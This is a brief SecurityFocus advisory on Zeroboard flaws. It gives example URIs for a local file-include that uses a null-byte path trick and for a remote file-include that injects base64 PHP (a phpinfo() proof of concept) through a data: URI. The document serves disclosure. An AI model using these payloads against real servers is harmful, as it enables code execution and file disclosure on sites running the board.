Zeroboard Multiple Remote Vulnerabilities

An attacker can exploit these issues through a browser.

The following example URIs are available:

For the local file-include issue:
http://www.example.com/include/write.php?dir=C:/Apache/htdocs/bbs/data/board1/make0day.txt%00

For the remote file-include issue:
http://www.example.com/include/print_category.php??setup[use_category]=1&dir=data:;base64,PD9waHBpbmZvKCk7Lyo=


 

Privacy Statement
Copyright 2010, SecurityFocus